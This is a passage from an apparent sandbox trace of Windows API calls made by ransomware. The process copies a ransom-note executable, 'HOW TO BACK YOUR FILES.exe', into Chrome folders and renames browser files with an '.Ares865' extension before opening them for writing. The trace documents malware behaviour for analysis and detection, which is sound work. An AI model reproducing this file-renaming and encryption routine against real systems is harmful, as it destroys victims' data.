(x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0142.439] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.439] GetLastError () returned 0x0 [0142.440] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0142.440] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533b4e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x533b4e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0142.440] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0142.440] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0142.440] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="widevinecdm.dll" | out: lpString1="widevinecdm.dll") returned="widevinecdm.dll" [0142.440] lstrlenW (lpString="widevinecdm.dll") returned 15 [0142.440] lstrlenW (lpString="Ares865") returned 7 [0142.440] lstrcmpiW (lpString1="cdm.dll", lpString2="Ares865") returned 1 [0142.440] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.Ares865") returned 125 [0142.440] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdm.dll"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdm.dll.ares865"), dwFlags=0x1) returned 1 [0142.442] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdm.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.442] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4460024) returned 1 [0142.665] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="widevinecdm.dll.sig" | out: lpString1="widevinecdm.dll.sig") returned="widevinecdm.dll.sig" [0142.666] lstrlenW (lpString="widevinecdm.dll.sig") returned 19 [0142.666] lstrlenW (lpString="Ares865") returned 7 [0142.666] lstrcmpiW (lpString1="dll.sig", lpString2="Ares865") returned 1 [0142.666] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig.Ares865") returned 129 [0142.666] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig.ares865"), dwFlags=0x1) returned 1 [0142.669] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdm.dll.sig.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.669] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1637) returned 1 [0142.678] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="widevinecdmadapter.dll" | out: lpString1="widevinecdmadapter.dll") returned="widevinecdmadapter.dll" [0142.678] lstrlenW (lpString="widevinecdmadapter.dll") returned 22 [0142.678] lstrlenW (lpString="Ares865") returned 7 [0142.678] lstrcmpiW (lpString1="ter.dll", lpString2="Ares865") returned 1 [0142.679] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.Ares865") returned 132 [0142.679] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.ares865"), dwFlags=0x1) returned 1 [0142.681] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.681] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=277336) returned 1 [0142.698] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="widevinecdmadapter.dll.sig" | out: lpString1="widevinecdmadapter.dll.sig") returned="widevinecdmadapter.dll.sig" [0142.698] lstrlenW (lpString="widevinecdmadapter.dll.sig") returned 26 [0142.698] lstrlenW (lpString="Ares865") returned 7 [0142.698] lstrcmpiW (lpString1="dll.sig", lpString2="Ares865") returned 1 [0142.699] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig.Ares865") returned 136 [0142.699] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig.ares865"), dwFlags=0x1) returned 1 [0142.710] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\win_x64\\widevinecdmadapter.dll.sig.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.710] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1407) returned 1 [0142.714] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements" [0142.715] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements" [0142.715] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0142.715] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\how to back your files.exe"), bFailIfExists=1) returned 0 [0142.716] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.716] GetLastError () returned 0x0 [0142.716] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0142.716] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533dafc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x533dafc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0142.717] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0142.717] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0142.717] lstrcpyW (in: lpString1=0x2cce49c, lpString2="logo.png" | out: lpString1="logo.png") returned="logo.png" [0142.717] lstrlenW (lpString="logo.png") returned 8 [0142.717] lstrlenW (lpString="Ares865") returned 7 [0142.717] lstrcmpiW (lpString1="ogo.png", lpString2="Ares865") returned 1 [0142.717] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.Ares865") returned 94 [0142.717] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png.ares865"), dwFlags=0x1) returned 1 [0142.750] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logo.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.751] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17450) returned 1 [0142.754] lstrcpyW (in: lpString1=0x2cce49c, lpString2="logocanary.png" | out: lpString1="logocanary.png") returned="logocanary.png" [0142.755] lstrlenW (lpString="logocanary.png") returned 14 [0142.755] lstrlenW (lpString="Ares865") returned 7 [0142.755] lstrcmpiW (lpString1="ary.png", lpString2="Ares865") returned 1 [0142.755] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.Ares865") returned 100 [0142.755] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logocanary.png"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logocanary.png.ares865"), dwFlags=0x1) returned 1 [0142.768] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\logocanary.png.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\logocanary.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.769] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=22337) returned 1 [0142.774] lstrcpyW (in: lpString1=0x2cce49c, lpString2="smalllogo.png" | out: lpString1="smalllogo.png") returned="smalllogo.png" [0142.774] lstrlenW (lpString="smalllogo.png") returned 13 [0142.774] lstrlenW (lpString="Ares865") returned 7 [0142.774] lstrcmpiW (lpString1="ogo.png", lpString2="Ares865") returned 1 [0142.775] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png.Ares865") returned 99 [0142.775] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\smalllogo.png"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\smalllogo.png.ares865"), dwFlags=0x1) returned 1 [0142.784] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogo.png.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\smalllogo.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.784] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7923) returned 1 [0142.787] lstrcpyW (in: lpString1=0x2cce49c, lpString2="smalllogocanary.png" | out: lpString1="smalllogocanary.png") returned="smalllogocanary.png" [0142.788] lstrlenW (lpString="smalllogocanary.png") returned 19 [0142.788] lstrlenW (lpString="Ares865") returned 7 [0142.788] lstrcmpiW (lpString1="ary.png", lpString2="Ares865") returned 1 [0142.788] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png.Ares865") returned 105 [0142.788] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\smalllogocanary.png"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\smalllogocanary.png.ares865"), dwFlags=0x1) returned 1 [0142.795] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\smalllogocanary.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.795] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7842) returned 1 [0142.798] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales" [0142.798] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales" [0142.798] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0142.798] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\how to back your files.exe"), bFailIfExists=1) returned 0 [0142.799] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.800] GetLastError () returned 0x0 [0142.800] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0142.800] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53401120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53401120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0142.800] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0142.800] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0142.800] lstrcpyW (in: lpString1=0x2cce48e, lpString2="am.pak" | out: lpString1="am.pak") returned="am.pak" [0142.800] lstrlenW (lpString="am.pak") returned 6 [0142.800] lstrlenW (lpString="Ares865") returned 7 [0142.801] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\am.pak.Ares865") returned 85 [0142.801] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\am.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\am.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\am.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\am.pak.ares865"), dwFlags=0x1) returned 1 [0142.803] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\am.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\am.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.803] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=455904) returned 1 [0142.837] lstrcpyW (in: lpString1=0x2cce48e, lpString2="ar.pak" | out: lpString1="ar.pak") returned="ar.pak" [0142.837] lstrlenW (lpString="ar.pak") returned 6 [0142.837] lstrlenW (lpString="Ares865") returned 7 [0142.837] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ar.pak.Ares865") returned 85 [0142.837] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ar.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ar.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ar.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ar.pak.ares865"), dwFlags=0x1) returned 1 [0142.840] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ar.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ar.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.840] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=450405) returned 1 [0142.863] lstrcpyW (in: lpString1=0x2cce48e, lpString2="bg.pak" | out: lpString1="bg.pak") returned="bg.pak" [0142.864] lstrlenW (lpString="bg.pak") returned 6 [0142.864] lstrlenW (lpString="Ares865") returned 7 [0142.864] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bg.pak.Ares865") returned 85 [0142.864] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bg.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\bg.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bg.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\bg.pak.ares865"), dwFlags=0x1) returned 1 [0142.867] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bg.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\bg.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.867] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=543911) returned 1 [0142.896] lstrcpyW (in: lpString1=0x2cce48e, lpString2="bn.pak" | out: lpString1="bn.pak") returned="bn.pak" [0142.896] lstrlenW (lpString="bn.pak") returned 6 [0142.896] lstrlenW (lpString="Ares865") returned 7 [0142.896] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bn.pak.Ares865") returned 85 [0142.897] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bn.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\bn.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bn.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\bn.pak.ares865"), dwFlags=0x1) returned 1 [0142.902] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bn.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\bn.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.902] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=694055) returned 1 [0142.950] lstrcpyW (in: lpString1=0x2cce48e, lpString2="ca.pak" | out: lpString1="ca.pak") returned="ca.pak" [0142.950] lstrlenW (lpString="ca.pak") returned 6 [0142.950] lstrlenW (lpString="Ares865") returned 7 [0142.951] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ca.pak.Ares865") returned 85 [0142.951] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ca.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ca.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ca.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ca.pak.ares865"), dwFlags=0x1) returned 1 [0142.954] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ca.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ca.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.954] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=329771) returned 1 [0142.978] lstrcpyW (in: lpString1=0x2cce48e, lpString2="cs.pak" | out: lpString1="cs.pak") returned="cs.pak" [0142.978] lstrlenW (lpString="cs.pak") returned 6 [0142.978] lstrlenW (lpString="Ares865") returned 7 [0142.979] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\cs.pak.Ares865") returned 85 [0142.979] MoveFileExW (lpExistingFileName="C:\\Program Files 